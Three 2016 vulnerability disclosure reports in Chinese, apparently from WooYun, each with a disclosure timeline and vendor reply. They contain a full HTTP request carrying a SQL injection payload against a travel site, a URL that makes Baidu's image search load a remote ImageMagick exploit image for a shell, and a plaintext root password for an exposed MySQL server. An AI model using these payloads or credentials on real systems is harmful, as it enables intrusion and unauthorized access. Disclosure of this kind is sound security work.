漏洞详情披露状态： 2016-05-01： 细节已通知厂商并且等待厂商处理中2016-05-03： 厂商已经确认，细节仅向厂商公开2016-05-13： 细节向核心白帽子及相关领域专家公开2016-05-23： 细节向普通白帽子公开2016-06-02： 细节向实习白帽子公开2016-06-17： 细节向公众公开简要描述： 详细说明： code 区域http://www.airpp.com/frontTicketHelpAction!aboutus.action code 区域http://sys.airpp.com鹏朋旅行网存在SQL注入漏洞：code 区域POST /pptravel/membermanage/proFrontManageAction!findProByParam.action HTTP/1.1 Content-Length: 81 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://sys.airpp.com/ Cookie: JSESSIONID=E2737DF255042B15594A3F75B1CB9682.tomcat1; JSESSIONID=E2737DF255042B15594A3F75B1CB9682.tomcat1; Hm_lvt_4060872cc09bf10b0082de626e535d51=1461809370,1461809527,1461809606,1461809870; Hm_lpvt_4060872cc09bf10b0082de626e535d51=1461809870; Clients_IPAddress=%u9655%u897F%u7701%2C%u897F%u5B89%u5E02; HMACCOUNT=15388A95F027CE2A; ASPSESSIONIDSQRBSRRA=NJEGFGIANMPJMIBLKPDLGLLD; ASPSESSIONIDCCDBCSTT=KMGGFGIABAANDOCEALCBBMJJ; __qc_wId=434; pgv_pvid=8689421847 Host: sys.airpp.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* pname=-1' OR 1=1* or 'u8Bhb1lb'=' &scores=1  漏洞证明： 修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-03 09:13厂商回复：感谢您对深航信息系统的关注和帮助，我们将尽快排查程序修补漏洞。最新状态：暂无

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：Imagick 利用点很多 不要总想着找上传详细说明：在百度识图手机版http://shitu.baidu.com/上传图片是不会被Imagick处理，但支持直接用远程图像url进行图像识别出现问题直接加载远程的exp图片http://shitu.baidu.com/n/searchpc?queryImageUrl=http%3A%2F%2F115browser.com%2Fexp1.png直接shell 漏洞证明： 支持远程读取图像的地方都可能出现问题修复方案： 版权声明：转载请注明来源 数据流@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：18确认时间：2016-05-06 18:00厂商回复：感谢您关注百度安全！最新状态：暂无

漏洞详情披露状态： 2016-05-22： 细节已通知厂商并且等待厂商处理中2016-05-22： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-22： 厂商已经主动忽略漏洞，细节向公众公开简要描述： 详细说明：详细说明请往下看↓先来点旁白,啦啦啦本屌又来了，(*^__^*) 嘻嘻无敌的传送门：http://42.51.9.122/漏洞证明： 我草这是什么？GM哇,GM哇，也就是说可以通过数据随意操控游戏，(*^__^*) 嘻嘻好了基友跟女朋友都在催我快点走，本屌就先提交到这把小口令走起：42.51.9.122 root !@#$%^修复方案：修改mysql密码 禁止外部连接版权声明：转载请注明来源 俊俊@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-22 20:40厂商回复：感谢白帽子的报告，经确认，对应IP非爱奇艺PPS所有，暂无法确认并联系上对应的合作方。 谢谢关注爱奇艺PPS安全最新状态：2016-05-23：感谢报告，经多方确认，移动端和PC上均无这款游戏。 因此该IP实际跟PPS没有任何关系。 感谢关注PPS安全